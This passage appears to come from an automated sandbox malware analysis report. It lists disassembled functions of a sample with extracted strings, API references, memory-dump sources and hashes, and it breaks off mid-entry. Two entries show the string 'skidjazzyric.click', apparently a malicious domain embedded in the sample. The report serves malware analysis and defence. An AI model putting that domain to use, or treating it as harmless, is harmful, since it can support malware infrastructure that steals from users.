Instruction Fuzzy Hash: F8416972A5C3405AE324AE65CC827ABB6D3EBD1324F18C93EF1D9472C5E9F848428316

Function 0067DD37 Relevance: 3.9, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

5230, xrefs: 0067DD87
A, xrefs: 0067DE7F
1, xrefs: 0067DE0A

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: 1$5230$A
API String ID: 0-2921844354
Opcode ID: c88d49dccca9c115cac4552a1e1a4679eb3bb04cb6d09c4ebc94843ec1f1dc21
Instruction ID: f09991f5c87b3483306a721a7a99d911f2042ed95edcb6aa908b3150be9f5140
Opcode Fuzzy Hash: c88d49dccca9c115cac4552a1e1a4679eb3bb04cb6d09c4ebc94843ec1f1dc21
Instruction Fuzzy Hash: 72417B72A4C3405AE324AE65CC8276BB6E3EFD2324F1CC93DF1D9572C5E5B948028312

Function 0066092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 00660966
., xrefs: 0066095F
GetProcAddress., xrefs: 006609DC, 006609DF, 006609E4

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 0767a01f73073ddf8465d6856b91ef3e7ecdbbdeaa762bea784f0377986859a6
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 2F316CB6900609DFEB10CF99C880AEEBBF6FF48324F24515AD441A7351D771EA45CBA4

Function 0041F6D0 Relevance: 3.3, Strings: 2, Instructions: 817COMMON

Download Yara Rule

Strings

B, xrefs: 00420058
9B, xrefs: 004201A0

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 9B$B
API String ID: 0-4208784936
Opcode ID: 986acf23185ab1b50e6ad9565e7f762b14932ce870d5dbc259a2a73c0999a18c
Instruction ID: b8962ee0846928653caa32ab1d9872d6313577c24d17d84896ac92dc99d0ed25
Opcode Fuzzy Hash: 986acf23185ab1b50e6ad9565e7f762b14932ce870d5dbc259a2a73c0999a18c
Instruction Fuzzy Hash: EF72B1B1619F808ED329CF3C8805397BFD6AB5A324F188B5EA0FA877D2C77561018756

Function 00404DC0 Relevance: 3.3, Strings: 2, Instructions: 792COMMON

Download Yara Rule

Strings

0, xrefs: 004056DB
8, xrefs: 004056D3

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 9612933fc297b7a00c689e7fbac69d4004b63af12444fb0bab41654d38c377b2
Instruction ID: e9fa4f5d571cc9b4581d9cfd2bfe47746d9f72a1d82526b1dd5866670584724d
Opcode Fuzzy Hash: 9612933fc297b7a00c689e7fbac69d4004b63af12444fb0bab41654d38c377b2
Instruction Fuzzy Hash: 78720071508740AFD710CF18C884BABBBE1EB89314F04892EF9999B391D379D958CF96

Function 00422380 Relevance: 2.9, Strings: 2, Instructions: 396COMMON

Download Yara Rule

Strings

@+p, xrefs: 00422736
:;, xrefs: 004223AC

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: :;$@+p
API String ID: 0-3144496387
Opcode ID: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
Opcode Fuzzy Hash: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A

Function 006825E7 Relevance: 2.9, Strings: 2, Instructions: 396COMMON

Download Yara Rule

Strings

:;, xrefs: 00682613
@+p, xrefs: 0068299D

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: :;$@+p
API String ID: 0-3144496387
Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
Instruction ID: 07d475dc645fcd82fbd1869ec83868b33abdbef55e4867d9b3a0128175513d61
Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
Instruction Fuzzy Hash: 09A1F8B1A053129BDB10AF24CCA27AB73E2EF81324F18862CF89597381E375DD45C756

Function 0043C5A0 Relevance: 2.9, Strings: 2, Instructions: 385COMMON

Download Yara Rule

Strings

@+p, xrefs: 0043C5CF, 0043C73A, 0043C7AF, 0043C91D
NP,?, xrefs: 0043C7C0

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: @+p$NP,?
API String ID: 0-642167754
Opcode ID: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
Opcode Fuzzy Hash: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799

Function 0069C807 Relevance: 2.9, Strings: 2, Instructions: 385COMMON

Download Yara Rule

Strings

@+p, xrefs: 0069C836, 0069C9A1, 0069CA16, 0069CB84
NP,?, xrefs: 0069CA27

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: @+p$NP,?
API String ID: 0-642167754
Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
Instruction ID: e0de955cf5f422c9fe3e2123e660975c2ab90ee102c77ebcf7b01c420767724f
Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
Instruction Fuzzy Hash: 95A14872A043209BDB24CF28C9D2B7BB7ABEBC5734F18862CE49857795D731AC018795

Function 00431E8E Relevance: 2.9, Strings: 2, Instructions: 383COMMON

Download Yara Rule

Strings

nz, xrefs: 00432051
nz, xrefs: 0043204A

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: nz$nz
API String ID: 0-4002586851
Opcode ID: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
Instruction ID: a3c1cfee1f99e453375e064e447a228442ae2f14524e15aa7be5cf63e3ec65e5
Opcode Fuzzy Hash: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
Instruction Fuzzy Hash: ACE11872608B808FD315CA3CC891396FFE2AFDA314F1D866DC5EA8B392D675A406C715

Function 006920F5 Relevance: 2.9, Strings: 2, Instructions: 383COMMON

Download Yara Rule

Strings

nz, xrefs: 006922B8
nz, xrefs: 006922B1

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: nz$nz
API String ID: 0-4002586851
Opcode ID: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
Instruction ID: 60edb0359af0b57ceb4610dfbba1cef928f0383368bb08843aa53a0dd27d96ba
Opcode Fuzzy Hash: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
Instruction Fuzzy Hash: 9DE1E572608B818FD315CB3CC891396BFE3AF9A310F1D866DC5EA8B792D675A406C711

Function 0040DFE2 Relevance: 2.8, Strings: 2, Instructions: 311COMMON

Download Yara Rule

Strings

UXY^, xrefs: 0040E295
skidjazzyric.click, xrefs: 0040E33F

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: UXY^$skidjazzyric.click
API String ID: 0-1204630608
Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction ID: d4a14a9f2c2f0854964ffc34a88a484fd9aac6a31bc7c6ca58301aeff22ad83a
Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction Fuzzy Hash: B79135B5504B418FD315CF2AC990622FBA2FF96300B188AACC0D24FB56C738E816CF95

Function 0066E249 Relevance: 2.8, Strings: 2, Instructions: 311COMMON

Download Yara Rule

Strings

UXY^, xrefs: 0066E4FC
skidjazzyric.click, xrefs: 0066E5A6

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: UXY^$skidjazzyric.click
API String ID: 0-1204630608
Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction ID: e86e50982766148c3b52a78ca056021ff65810be688ae70414c971207e4dda7d
Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction Fuzzy Hash: 359102B5604B818FD3158F29C990662FBE2FF96300B19869CD0D28FB56C779E806CB95

Function 00442470 Relevance: 2.8, Strings: 2, Instructions: 294COMMON

Download Yara Rule

Strings

_\]R, xrefs: 00442490
@+p, xrefs: 0044252E, 0044265A

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: InitializeThunk
String ID: @+p$_\]R
API String ID: 2994545307-3269340934
Opcode ID: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
Opcode Fuzzy Hash: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A

Function 006A26D7 Relevance: 2.8, Strings: 2, Instructions: 294COMMON

Download Yara Rule

Strings

@+p, xrefs: 006A2795, 006A28C1
_\]R, xrefs: 006A26F7

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: @+p$_\]R
API String ID: 0-3269340934
Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
Instruction ID: 1752ee10ccb0ef59d118004d45d11b0bd52959ecd4ce4d0b6baf2ee4cf21a28b
Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
Instruction Fuzzy Hash: E79105315483528BCB18EF2C8860A6FB7E3EFDA714F19856CE48587391D731DD058B86

Function 00427490 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

o~, xrefs: 004275E6
yr, xrefs: 004275CE

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: o~$yr
API String ID: 0-1013308823
Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786

Function 006876F7 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

o~, xrefs: 0068784D
yr, xrefs: 00687835

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: o~$yr
API String ID: 0-1013308823
Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
Instruction ID: 577e1970a9d465ad3ad339c4cd3489dfaa1f4d51615ddf31f3210663e6b22355
Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
Instruction Fuzzy Hash: DB91497690C3508BD320DF18C854AABBBE2EFD5314F198A2CE9C95B391E7B4C905C786

Function 00427F30 Relevance: 2.8, Strings: 2, Instructions: 280COMMON

Download Yara Rule

Strings

@+p, xrefs: 00427FB8, 00428099
, xrefs: 00428074, 00428093, 004280C4

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: InitializeThunk
String ID: @+p$
API String ID: 2994545307-3312668643
Opcode ID: 33388ca08c4aa4384a6a50b745ca2427dff1f241a701fdc63bacc148eca0ebac
Instruction ID: 7661637dc5d8e8a5c488f056d59cc6aa38c937314abadac712079a8ab4c4f304
Opcode Fuzzy Hash: 33388ca08c4aa4384a6a50b745ca2427dff1f241a701fdc63bacc148eca0ebac
Instruction Fuzzy Hash: 308157717093209BD7149B25AC92B3F73A1EF81314F59862EE985573C1EB3C9C1A839A

Function 00688197 Relevance: 2.8, Strings: 2, Instructions: 280COMMON

Download Yara Rule

Strings

@+p, xrefs: 0068821F, 00688300
, xrefs: 006882DB, 006882FA, 0068832B

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: @+p$
API String ID: 0-3312668643
Opcode ID: e0b172cd705df7923fbf2ed4e27c4b33ed5b0099bb5f0496611bea36cd42384f
Instruction ID: 01298c00693b1a01bf4c868d946424cc7d6f0ba03c7348f90b9fa83af2664c73
Opcode Fuzzy Hash: e0b172cd705df7923fbf2ed4e27c4b33ed5b0099bb5f0496611bea36cd42384f
Instruction Fuzzy Hash: F28148B1A087109FD714ABA48C92A6FB3E7EFD1724F58873CE88547381EB359C068795

Function 004427B0 Relevance: 2.7, Strings: 2, Instructions: 247COMMON

Download Yara Rule

Strings

=^"\, xrefs: 004428B7
@+p, xrefs: 004427C7, 00442886

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: =^"\$@+p
API String ID: 0-3325604900
Opcode ID: 5d48baccbf68c9a420e3b87b0224fb92148870bc23ec7fb025ccf02abde862b7
Instruction ID: 31f6d952e69ddc92c57c3d15082e8394249c76af6de0d574896d183d93ceef01
Opcode Fuzzy Hash: 5d48baccbf68c9a420e3b87b0224fb92148870bc23ec7fb025ccf02abde862b7
Instruction Fuzzy Hash: 4281DE383052019BE724DF1CD990A2BB3E2EF89314F54866DF9858B3A0DB35EC51CB0A

Function 00428280 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

:7$%, xrefs: 004282C5, 004282F6
:7$%, xrefs: 00428375

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: :7$%$:7$%
API String ID: 0-2391988857
Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82

Function 006884E7 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

:7$%, xrefs: 0068855D, 0068852C
:7$%, xrefs: 006885DC

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: :7$%$:7$%
API String ID: 0-2391988857
Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
Instruction ID: af556fb6827eb006478c3eab274f00936167c22b5b8508d3f3c4b0b1a381bb07
Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
Instruction Fuzzy Hash: F721D3701083808BD7489F79C965B6FFBE5BB86318F105A2CE1D287291DBB4C409CB82

Function 00676D15 Relevance: 2.6, Strings: 2, Instructions: 67COMMON

Download Yara Rule

Strings

, xrefs: 00676D4C, 00676D8F, 00676DD2
@+p, xrefs: 00676D98

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: @+p$
API String ID: 0-3312668643
Opcode ID: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
Instruction ID: e6017d65f71b39b7f26b09a8c476d2f8592966ed90813d114bafe18e4f06cce3
Opcode Fuzzy Hash: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
Instruction Fuzzy Hash: 1311E671718240AFD7708B64CD867ABB3E7ABD2324F28862CE198972D1DB74D8418A09

Function 0066AC99 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

MO, xrefs: 0066AC36
MO, xrefs: 0066AC9E

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: MO$MO
API String ID: 0-3148518880
Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction ID: 2838658acecbd1d8ad0cbb3a1cd9ec6604dbd4589b0297743e006cce45fc92b9
Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction Fuzzy Hash: 9911AC741442818BEF148FA8DD92667BFA0EF42320F2499D8DC856F38BC638C502CF65

Function 0044042D Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

vA\, xrefs: 0044049C
7&'$, xrefs: 00440445

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 7&'$$vA\
API String ID: 0-2621209329
Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C

Function 006A0694 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

vA\, xrefs: 006A0703
7&'$, xrefs: 006A06AC

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: 7&'$$vA\
API String ID: 0-2621209329
Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction ID: 95712deb57c8a00b3f258c2544de944192b803c2d1f70e7ccf7b75e33fc562ca
Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction Fuzzy Hash: ADF068345145944BEB918F3C98996FE67F1E753314F302AB5C65AE32A2C631C8918F08

Function 0041194F Relevance: 2.2, APIs: 1, Instructions: 666COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 00411D64

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 7cd814f07503108b401f8375ab37499eb4f108dc70f145f49585bda23ac5c5ec
Instruction ID: a8cfc5bf14821c73dd49e5f1522f5c4ec20a02328b59693b871348f0b0df5eb8
Opcode Fuzzy Hash: 7cd814f07503108b401f8375ab37499eb4f108dc70f145f49585bda23ac5c5ec
Instruction Fuzzy Hash: E4420A71A04B408FD714DF38D9813A6BBE1AF95314F188A3ED5EB8B3D2D639A446C706

Function 0043CD27 Relevance: 2.0, Strings: 1, Instructions: 747COMMON

Download Yara Rule

Strings

/p, xrefs: 0043D2AD

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: /p
API String ID: 0-62938030
Opcode ID: f05dc9b10545ef86860d8fcbb8867fd065d1046c62c590d4d0da79f29562f858
Instruction ID: ba8b9978e2f20e60afdbbdaba48a15688935c3ff76d45a9363d37c1b9ca99bef
Opcode Fuzzy Hash: f05dc9b10545ef86860d8fcbb8867fd065d1046c62c590d4d0da79f29562f858
Instruction Fuzzy Hash: 7C32003AA18351CBD7049F39D81226BB7E1FF9A320F19887ED8C183291E779C955C786

Function 00677AE4 Relevance: 1.8, APIs: 1, Instructions: 334COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00677E61

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
Instruction ID: 440bd874183023768748c8ccde5ed6881204d6a95a603d39dcf2cec09b602672
Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
Instruction Fuzzy Hash: 70B1F2729187218BC314CF28C8916AAB7E2FFD9714F19962CE4C95B354E7389D02CB96

Function 00426C76 Relevance: 1.8, Strings: 1, Instructions: 581COMMON

Download Yara Rule

Strings

@+p, xrefs: 00426956

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: @+p
API String ID: 0-2846808199
Opcode ID: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
Instruction ID: d2e23a67c1903cd1e9c185385271eb72bcb916f6a4fd91b19e1fe5de6aa7faac
Opcode Fuzzy Hash: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
Instruction Fuzzy Hash: 4B122775B00226CBDB14CF68D8917AFB7B2FF8A300F5980A9C441AB3A5D7399D42DB54

Function 00437B69 Relevance: 1.7, APIs: 1, Instructions: 227COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 00437C90

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: Object
String ID:
API String ID: 2936123098-0
Opcode ID: 5bfd6ba3a5852fa2e976878255e20d7f7abe229613a7257217ba93b1cb630f99
Instruction ID: c3200330e68ce6aff19a63fed1a4000c560c1f69ed3aeb6105e6dfa3e47a6751
Opcode Fuzzy Hash: 5bfd6ba3a5852fa2e976878255e20d7f7abe229613a7257217ba93b1cb630f99
Instruction Fuzzy Hash: 9C91C3B1E042548FCB18CF6CC89179EBBF2AF89310F2982ADD855AB391D7759C01CB91

Function 00697DD0 Relevance: 1.7, APIs: 1, Instructions: 227COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 00697EF7

Memory Dump Source

